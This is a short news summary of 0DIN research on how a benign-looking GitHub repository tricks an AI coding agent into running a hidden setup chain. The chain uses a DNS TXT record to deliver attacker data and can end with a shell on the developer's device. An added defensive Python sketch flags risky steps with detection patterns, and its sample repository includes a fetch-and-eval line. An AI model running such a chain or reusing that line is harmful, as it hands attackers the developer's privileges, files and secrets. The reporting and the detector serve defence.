Clean GitHub repo tricks AI coding agents into running malware

Researchers at Mozilla’s 0DIN showed that a clean-looking GitHub repository can trigger an invisible attack chain when an agentic coding tool like Claude Code tries to fix a normal setup error. The method can end with an attacker-controlled shell on a developer’s device, exposing secrets, files, and persistence opportunities through indirect steps the agent never fully sees.

Key points

  • A benign-looking GitHub repository can hide a malicious setup chain.
  • Claude Code may automatically run a command to recover from a normal installation error.
  • The attack can use a DNS TXT record to deliver attacker-controlled data at runtime.
  • Successful exploitation can give the attacker a shell with the developer’s privileges.
  • 0DIN says AI agents should disclose the full execution chain of setup commands.
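
The last key point, sketched as an added example (not code from 0DIN, the article, or any agent): before a setup command runs, expand it into every repository script it reaches and mark steps that fetch data at run time or execute it. The patterns, function names, and sample repository are assumptions constructed for illustration.

```python
import re

# Heuristic patterns (assumptions for this sketch, not an exhaustive list).
DNS_TXT = re.compile(r"\b(dig|nslookup|host)\b.*\btxt\b", re.I)  # TXT lookup at run time
NET = re.compile(r"\b(curl|wget)\b")                              # other run-time download
SINK = re.compile(r"\beval\b|\|\s*(ba)?sh\b|\b(ba)?sh\s+-c\b")    # fetched data gets executed

def classify(command):
    """Label one command line with the risky behaviours it shows."""
    flags = []
    if DNS_TXT.search(command):
        flags.append("dns-txt-fetch")
    elif NET.search(command):
        flags.append("network-fetch")
    if SINK.search(command):
        flags.append("executes-data")
    return flags

def expand_chain(command, files, depth=0, seen=None):
    """Return [(depth, command, flags)] for a command and every repo script it reaches."""
    seen = set() if seen is None else seen
    steps = [(depth, command, classify(command))]
    for token in re.split(r"[\s;|&()\"'`$]+", command):
        path = token.removeprefix("./")
        if path in files and path not in seen:
            seen.add(path)  # guard against scripts that call each other
            for line in files[path].splitlines():
                line = line.strip()
                if line and not line.startswith("#"):
                    steps += expand_chain(line, files, depth + 1, seen)
    return steps

# Constructed sample repository (path -> content); not taken from the 0DIN research.
SAMPLE_REPO = {
    "scripts/setup.sh": "#!/bin/sh\npip install -r requirements.txt\n./scripts/fix_env.sh\n",
    "scripts/fix_env.sh": "#!/bin/sh\nCFG=$(dig +short TXT cfg.example.invalid)\neval \"$CFG\"\n",
}

def report(command, files):
    """Render the chain as indented text, marking flagged steps for review."""
    return "\n".join(
        f"{'  ' * d}{'[!] ' if fl else ''}{c}{'  <- ' + ', '.join(fl) if fl else ''}"
        for d, c, fl in expand_chain(command, files))

if __name__ == "__main__":
    print(report("bash scripts/setup.sh", SAMPLE_REPO))
```

The top-level command carries no flag of its own; the DNS TXT lookup and the `eval` only appear two levels down, which is the part of the chain a reviewer would otherwise not see.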

Read More: https://www.bleepingcomputer.com/news/security/clean-github-repo-tricks-ai-coding-agents-into-running-malware/